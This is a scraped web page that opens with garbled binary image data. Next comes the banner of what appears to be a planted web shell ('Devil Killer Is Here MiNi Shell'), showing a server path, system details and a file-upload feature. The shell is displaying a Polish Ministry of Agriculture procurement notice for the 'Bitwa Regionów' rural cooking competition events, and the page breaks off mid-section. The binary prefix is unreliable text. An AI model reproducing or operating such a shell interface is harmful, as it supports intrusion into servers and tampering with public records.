JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220902/0033202401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa przygotowania i organizacji 16 wydarzeń na etapie wojewódzkim w ramach rozstrzygnięcia II etapu VII edycji Konkursu dla kół gospodyń wiejskich pn.: „Bitwa Regionów” w podziale na 4 części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ministerstwo Rolnictwa i Rozwoju Wsi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000063880</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wspólna 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-930</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@minrol.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/rolnictwo</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Rolnictwo, rybołówstwo, rozwój wsi, rynki rolne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa przygotowania i organizacji 16 wydarzeń na etapie wojewódzkim w ramach rozstrzygnięcia II etapu VII edycji Konkursu dla kół gospodyń wiejskich pn.: „Bitwa Regionów” w podziale na 4 części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3c4799b3-2aa1-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00332024</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00085397/18/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.10 Organizacja 16 wydarzeń w ramach przeprowadzenia II etapu wojewódzkiego Konkursu Kulinarnego dla kół gospodyń wiejskich pn. Bitwa Regionów, w podziale na 4 części</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami może odbywać się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAP-u https://epuap.gov.pl/wps/portal oraz poczty elektronicznej Zamawiającego.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego drogą elektroniczną, musi posiadać<br/>konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub<br/>wniosku oraz do formularza do komunikacji.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortalu oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego<br/>regulaminu.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub<br/>wniosku oraz do komunikacji wynosi 150 MB.<br/>6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy, podmiotowych środków dowodowych,<br/>przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu,<br/>przyjmuje się datę ich przekazania na ePUAP lub datę wpływu poczty e-mail do Zamawiającego.<br/>7. Wykonawca ponosi wszystkie koszty związane z przygotowaniem i złożeniem oferty.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 rozporządzenia Paramentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz. Urz. UE L Nr 119 z 04.05.2016 r., str.1, z późn. zm.), zwanym<br/>dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Minister Rolnictwa i Rozwoju Wsi. Siedziba Ministerstwa Rolnictwa i Rozwoju<br/>Wsi znajduje się w Warszawie, ul. Wspólna 30, kod 00-930;<br/>2) dane kontaktowe Inspektora Ochrony Danych - iod@minrol.gov.pl, tel. 22 623 26 25.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych;<br/>5) Pani/Pana dane osobowe przetwarzane będą przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia (w<br/>przypadku zamówień współfinansowanych ze środków Unii Europejskiej przez okres 5 lat), a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy, a po tym okresie będą archiwizowane w czasie określonym<br/>przepisami prawa, zgodnie z instrukcją kancelaryjną MRiRW;<br/>6) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>7) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>8) podanie przez Pana/Panią danych osobowych jest wymogiem ustawowym. Jest Pan/Pani zobowiązana do ich podania, a<br/>konsekwencją niepodania danych osobowych będzie niemożliwość oceny ofert i zawarcia umowy;<br/>9) dane udostępnione przez Panią/Pana nie będą przetwarzane w sposób zautomatyzowany, w tym nie będą podlegały profilowaniu;<br/>10) administrator danych nie ma zamiaru przekazywać danych osobowych do państwa trzeciego lub organizacji międzynarodowej.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BA.zp.23.1.62.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1443918,50 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia stanowią usługi przygotowania i organizacji 16 wydarzeń na etapach wojewódzkich w ramach rozstrzygnięcia II etapu Konkursu Kulinarnego skierowanego do Kół Gospodyń Wiejskich pn. „Bitwa Regionów” w podziale na 4 części. <br/>2.	Ze względu na specyfikę przedmiotu zamówienia oraz konieczność jego wykonania w ściśle określonych terminach, zamówienie podzielone jest na 4 części, z których każda obejmuje organizację 4 wydarzeń (etapów wojewódzkich) – każde na terenie jednego województwa, tj.:<br/>1)	Część I (wartość szacunkowa: 289 634,30 zł netto) - Województwo: kujawsko-pomorskie, pomorskie, warmińsko-mazurskie, zachodniopomorskie; <br/>2)	Część II (wartość szacunkowa: 289 938,40 zł netto) – Województwo: dolnośląskie, lubuskie, opolskie, wielkopolskie;<br/>3)	Część III (wartość szacunkowa: 478 102,80 zł netto) – Województwo: lubelskie, łódzkie, mazowieckie, podlaskie; <br/>4)	Część IV (wartość szacunkowa: 386 243,00 zł netto) – Województwo: małopolskie, podkarpackie, śląskie, świętokrzyskie.<br/>Szczegółowy Opis Przedmiotu Zamówienia (OPZ) dla każdej części zamówienia znajduje się w załącznikach (dla Części I - załącznik nr 1a, dla Części II - załącznik nr 1b, dla części III - załącznik nr 1c, dla Części IV - załącznik nr 1d) do projektu umowy, który stanowi załącznik nr 1 do SWZ. <br/>Wydarzenia odbędą się w terminach nie pokrywających się ze sobą zgodnie z harmonogramem zawartym w szczegółowym Opisie Przedmiotu Zamówienia (OPZ) dla każdej z części zamówienia.<br/>Wydarzenia (16 wydarzeń – 1 wydarzenie w każdym województwie) zostaną zorganizowane w lokalach wskazanych w Opisie Przedmiotu Zamówienia dla każdej z części zamówienia. Zamawiający udostępni Wykonawcy lokale do organizacji wydarzeń nieodpłatnie. Przewidywana frekwencja podczas każdego z 16 wydarzeń na etapach wojewódzkich została określona w Opisie Przedmiotu Zamówienia. W ramach realizacji każdego z wydarzeń Wykonawca zapewni m.in. infrastrukturę niezbędną do organizacji wydarzenia we wskazanych lokalizacjach oraz catering dla uczestników, na który będą składać się wysokiej jakości rzemieślnicze, regionalne produkty spożywcze oraz wysokiej jakości potrawy z tych produktów podane w formie szwedzkiego stołu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 289634,30 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79956000-0 - Usługi w zakresie organizacji targów i wystaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">22 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	CENA (K1) - 60%<br/>2) Aspekt środowiskowy (K2) – 40%<br/>Kryterium (K2) zostanie ocenione w skali punktowej do 40 punktów. <br/>Zamawiający przyzna po 10 pkt dla każdej z nw. kategorii produktów spożywczych (dotyczy wszystkich rodzajów danej kategorii produktu), które zostaną użyte do realizacji usługi cateringowej, tj.:<br/>a) ser (4 rodzaje) – 10 pkt; <br/>b) wędlina (4 rodzaje) – 10 pkt;<br/>c) ryba (1 rodzaj) – 10 pkt;<br/>d) mięso do dania głównego (2 rodzaje) – 10 pkt,<br/>na podstawie złożonej przez Wykonawcę w Formularzu oferty (Załącznik nr 2 do SWZ) deklaracji (zobowiązania się) wykorzystania w danej kategorii produktu wyłącznie produktów spożywczych, które posiadają co najmniej 1 (jeden) z poniższych znaków potwierdzających wysoką jakość żywności, tj.:<br/>GRUPA I - Produkty certyfikowane w ramach krajowych systemów jakości:<br/>1.1. „System Gwarantowanej Jakości Żywności” (QAFP);<br/>1.2. „System gwarantowania jakości mięsa wołowego” (QMP);<br/>1.3. „Jakość Tradycja”;<br/>GRUPA II - Produkty z certyfikatami unijnymi:<br/>2.1. „Chroniona Nazwa Pochodzenia”;<br/>2.2. „Chronione Oznaczenie Geograficzne”;<br/>2.3. „Gwarantowana Tradycyjna Specjalność”;<br/>2.4. „Rolnictwo ekologiczne”.<br/>W przypadku braku złożenia przez Wykonawcę w Formularzu oferty deklaracji (zobowiązania się) wykorzystania w którejkolwiek z czterech kategorii produktów wyłącznie produktów spożywczych, które posiadają co najmniej 1 (jeden) z powyższych znaków potwierdzających wysoką jakość żywności – Zamawiający przyzna 0 pkt wdanej kategorii.<br/>3.	Za ofertę najkorzystniejszą zostanie uznana ta oferta, która po zsumowaniu liczby punktów uzyskanych we wskazanych wyżej kryteriach uzyska najwyższą liczbę punktów tj.: Ł = K1 + K2.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt środowiskowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <p class="mb-0">wymagania dotyczące określonej etykiety, zgodnie z art. 104 ustawy - etykiety środowiskowej (tzw. Ekoetykieta)</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia stanowią usługi przygotowania i organizacji 16 wydarzeń na etapach wojewódzkich w ramach rozstrzygnięcia II etapu Konkursu Kulinarnego skierowanego do Kół Gospodyń Wiejskich pn. „Bitwa Regionów” w podziale na 4 części. <br/>2.	Ze względu na specyfikę przedmiotu zamówienia oraz konieczność jego wykonania w ściśle określonych terminach, zamówienie podzielone jest na 4 części, z których każda obejmuje organizację 4 wydarzeń (etapów wojewódzkich) – każde na terenie jednego województwa, tj.:<br/>1)	Część I (wartość szacunkowa: 289 634,30 zł netto) - Województwo: kujawsko-pomorskie, pomorskie, warmińsko-mazurskie, zachodniopomorskie; <br/>2)	Część II (wartość szacunkowa: 289 938,40 zł netto) – Województwo: dolnośląskie, lubuskie, opolskie, wielkopolskie;<br/>3)	Część III (wartość szacunkowa: 478 102,80 zł netto) – Województwo: lubelskie, łódzkie, mazowieckie, podlaskie; <br/>4)	Część IV (wartość szacunkowa: 386 243,00 zł netto) – Województwo: małopolskie, podkarpackie, śląskie, świętokrzyskie.<br/>Szczegółowy Opis Przedmiotu Zamówienia (OPZ) dla każdej części zamówienia znajduje się w załącznikach (dla Części I - załącznik nr 1a, dla Części II - załącznik nr 1b, dla części III - załącznik nr 1c, dla Części IV - załącznik nr 1d) do projektu umowy, który stanowi załącznik nr 1 do SWZ. <br/>Wydarzenia odbędą się w terminach nie pokrywających się ze sobą zgodnie z harmonogramem zawartym w szczegółowym Opisie Przedmiotu Zamówienia (OPZ) dla każdej z części zamówienia.<br/>Wydarzenia (16 wydarzeń – 1 wydarzenie w każdym województwie) zostaną zorganizowane w lokalach wskazanych w Opisie Przedmiotu Zamówienia dla każdej z części zamówienia. Zamawiający udostępni Wykonawcy lokale do organizacji wydarzeń nieodpłatnie. Przewidywana frekwencja podczas każdego z 16 wydarzeń na etapach wojewódzkich została określona w Opisie Przedmiotu Zamówienia. W ramach realizacji każdego z wydarzeń Wykonawca zapewni m.in. infrastrukturę niezbędną do organizacji wydarzenia we wskazanych lokalizacjach oraz catering dla uczestników, na który będą składać się wysokiej jakości rzemieślnicze, regionalne produkty spożywcze oraz wysokiej jakości potrawy z tych produktów podane w formie szwedzkiego stołu.<br/>3.	Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną lub więcej części zamówienia.<br/>4.	Zamawiający nie wymaga, ani nie dopuszcza złożenia ofert wariantowych. <br/>5.	Zamawiający nie wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę osób wykonujących czynności w zakresie realizacji zamówienia na podstawie stosunku pracy, gdyż wykonanie tych czynności nie polega na wykonywaniu tych czynności w sposób określony w artykule 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeksu pracy (Dz.U. z 2022 r. poz. 1510 z późn. zm.).<br/>6.	Zamawiający na podstawie art. 462 ust. 2 ustawy żąda, aby Wykonawca wskazał w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podał nazwy podwykonawców (jeżeli są już znani). <br/>7.	Zamawiający nie przewiduje możliwości udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 289938,40 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79956000-0 - Usługi w zakresie organizacji targów i wystaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">22 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	CENA (K1) - 60%<br/>2) Aspekt środowiskowy (K2) – 40%<br/>Kryterium (K2) zostanie ocenione w skali punktowej do 40 punktów. <br/>Zamawiający przyzna po 10 pkt dla każdej z nw. kategorii produktów spożywczych (dotyczy wszystkich rodzajów danej kategorii produktu), które zostaną użyte do realizacji usługi cateringowej, tj.:<br/>a) ser (4 rodzaje) – 10 pkt; <br/>b) wędlina (4 rodzaje) – 10 pkt;<br/>c) ryba (1 rodzaj) – 10 pkt;<br/>d) mięso do dania głównego (2 rodzaje) – 10 pkt,<br/>na podstawie złożonej przez Wykonawcę w Formularzu oferty (Załącznik nr 2 do SWZ) deklaracji (zobowiązania się) wykorzystania w danej kategorii produktu wyłącznie produktów spożywczych, które posiadają co najmniej 1 (jeden) z poniższych znaków potwierdzających wysoką jakość żywności, tj.:<br/>GRUPA I - Produkty certyfikowane w ramach krajowych systemów jakości:<br/>1.1. „System Gwarantowanej Jakości Żywności” (QAFP);<br/>1.2. „System gwarantowania jakości mięsa wołowego” (QMP);<br/>1.3. „Jakość Tradycja”;<br/>GRUPA II - Produkty 